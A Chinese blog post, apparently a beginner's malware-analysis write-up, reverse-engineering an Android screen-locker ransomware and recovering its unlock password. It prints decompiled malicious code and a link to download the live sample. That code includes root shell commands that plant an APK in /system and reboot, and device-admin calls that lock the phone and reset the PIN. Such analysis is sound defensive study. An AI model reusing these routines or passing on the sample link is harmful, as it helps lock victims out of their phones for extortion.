Android学习第七天---记录一次锁机软件的破解

自己学习别人的帖子实战一下试试吧 以后也能装逼 反正这两天心情不好不是很想学习

原贴

首先安装一下 app

提示需要超级管理员权限 一看就不是好东西 给呗

然后手机就从新启动了

然后就出现了 这个zz的界面 不停的播放音乐

上面标记的两个地方一个事输入的一个是按钮（二维码）基本上很多app都是这个套路 如果找不到可以到Android studio里面看一下框架就知道了

现在分析一下这个软件 拖到jeb里面

<activity android:label="@string/app_name" android:name=".c">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

去到dex里面找 c (smile)我看不懂 邮件 Decompile查看java代码

看看OnCreate方法，这个方法就是在窗口被打开的时候调用的：

 @Override protected void onCreate(Bundle arg10) {
        c v0 = this;
        LogCatBroadcaster.start(v0);
        super.onCreate(arg10);
        v0.setContentView(2130903040);
        v0.b = v0.findViewById(2131099651);
        v0.t = v0.findViewById(0);
        v0.b.setOnClickListener(new ButtonClickListener(v0));
        c v4 = v0;
        try {
            v4.d(new StringBuffer().append(v0.path).append("/zihao.l").toString());
        }
        catch(IOException v4_1) {
        }
    }

主要看这两句

v0.b.setOnClickListener(new ButtonClickListener(v0));

v4.d(new StringBuffer().append(v0.path).append("/zihao.l").toString());

第一句是给那个”点击打开悬浮窗”的按钮设置按钮事件 对应的是onClick方法 看一下

 @Override public void onClick(View arg8) {
            new b().rootShell();
            a.deleteFile(c.this.file);
        }

可以看到 我是60分java乱说 b新建了一个函数rootshell 我们到b.smile中看看去（大致可以才想到是获取root权限的）

void rootShell() {
        b.execCommand(new String[]{"mount -o rw,remount /system", "mount -o rw,remount /system/app", "cp /sdcard/zihao.l /system/app/", "chmod 777 /system/app/zihao.l", "mv /system/app/zihao.l /system/app/zihao.apk", "chmod 644 /system/app/zihao.apk", "reboot"}, true);
    }

可以看到大概就是把/sdcard/zihao.l这个文件当成一个APK安装到系统分区里，最后reboot就是重启，当然，他在期间申请了所需要的权限；

这个zihao.l是如何来的 回到c.smile里面 可以看到

 private void d(String arg13) throws IOException {
        FileOutputStream v3 = new FileOutputStream(arg13);
        InputStream v2 = this.getAssets().open("ijm-x86.so");
        byte[] v4 = new byte[1024];
        int v5;
        for(v5 = v2.read(v4); v5 > 0; v5 = v2.read(v4)) {
            v3.write(v4, 0, v5);
        }

        v3.flush();
        v2.close();
        v3.close();
    }

再看看这个 onCreate里面的

try {
            v4.d(new StringBuffer().append(v0.path).append("/zihao.l").toString());
        }

这几句就是无限循环的读，读到没得读为止，边读边写，读谁？读自身存储路劲下的ijm-x86.so，然后写出到arg13这个路径，就是在前面传进来的那个路径：
v0.path在构造器中已经声明了是取SD卡根路径；
到这，第一层就结束了，手机开始重启，重启之后就会听到一首十分动听的歌曲

那我们来到第二层 将ijm-x86.so改为 ijm-x86.apk拖进jeb里面分析一下

还是先看MainFast.xml

<activity android:label="@string/app_name" android:name=".M">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

” android:name=”.M” 嗯..先看看m.smile

 private void activiteDevice() {
        Class v8;
        M v0 = this;
        Intent v1 = new Intent("android.app.action.ADD_DEVICE_ADMIN");
        ComponentName v5 = null;
        ComponentName v6 = null;
        M v7 = v0;
        try {
            v8 = Class.forName("com.h.MyAdmin");
        }
        catch(ClassNotFoundException v5_1) {
            throw new NoClassDefFoundError(v5_1.getMessage());
        }

        super(((Context)v7), v8);
        v1.putExtra("android.app.extra.DEVICE_ADMIN", ((Parcelable)v5));
        v0.startActivityForResult(v1, 0);
    }

    @Override public void onCreate(Bundle arg6) {
        LogCatBroadcaster.start(this);
        super.onCreate(arg6);
        this.activiteDevice();
    }

意思就是启动MyAdmin这个receiver 我们进入MyAdmin看看

 @Override public CharSequence onDisableRequested(Context arg10, Intent arg11) {
        String v4 = Integer.toString(1997);
        this.getManager(arg10).lockNow();
        this.getManager(arg10).resetPassword(v4, 0);
        return super.onDisableRequested(arg10, arg11);
    }

主要就是把锁屏的 pin 码设置为 1997，然后又启动了 s 这个服务，那来看看这个 s 把；
好乱啊.. 全部无视直接看 onCreate 和 onStart

    @Override public void onCreate() {
        s v0 = this;
        super.onCreate();
        v0.pass = ((long)(Math.random() * (((double)155))));
        v0.passw = new Long((v0.pass + (((long)7176))) * (((long)7)));
        v0.des = new DU("flower");
        s v3 = v0;
        try {
            v3.des = new DU(v0.des.decrypt("c29fe56fa59ab0db"));
        }
        catch(Exception v3_1) {
        }

        v0.share = v0.getSharedPreferences("Flowers", 0);
        v0.editor = v0.share.edit();
        if(v0.share.getLong("m", ((long)0)) == (((long)0))) {
            v0.editor.putLong("m", v0.pass);
            v0.editor.commit();
            v3 = v0;
            try {
                v3.editor.putString("passw", v0.des.encrypt(new StringBuffer().append("").append(v0.passw).toString()));
                v0.editor.commit();
            }
            catch(Exception v3_1) {
            }

            if(v0.is(v0.getApplicationContext())) {
                v0.ppss = new StringBuffer().append(v0.share.getLong("m", ((long)8))).append("").toString();
                v3 = v0;
                s v4 = v0;
                try {
                    v3.password = v4.des.decrypt(v0.share.getString("passw", ""));
                }
                catch(Exception v3_1) {
                }

                new 100000000(v0).start();
                return;
            }

            v3 = v0;
            try {
                v3.editor.putLong("m", Long.parseLong(v0.des.decrypt("5a15e58cc8db8d1c700ecb6bb7b627a9")));
                v0.editor.commit();
                v0.editor.putString("passw", "5a15e58cc8db8d1c700ecb6bb7b627a9");
                v0.editor.commit();
            }
            catch(Exception v3_1) {
            }
        }
    }

这里一看就是加解密的 请教大土豆师傅 师傅叫我smali插桩 这个是要学习学习 肯定有用 开始跑题 算了 就先这样把这个分析完吧 下一篇学习smali插桩

这里可一看到是用 c29fe56fa59ab0db解出来的值作为密钥

然后再解密

秘钥就是 “ （序列号++7176)*7 ”

恶意软件下载地址

样品：链接: http://pan.baidu.com/s/1kVdav8F 密码: 8wtz

成功解锁

删除的方法 adb 连接 进去删除 有些可以直接这样删除 就不用那么麻烦了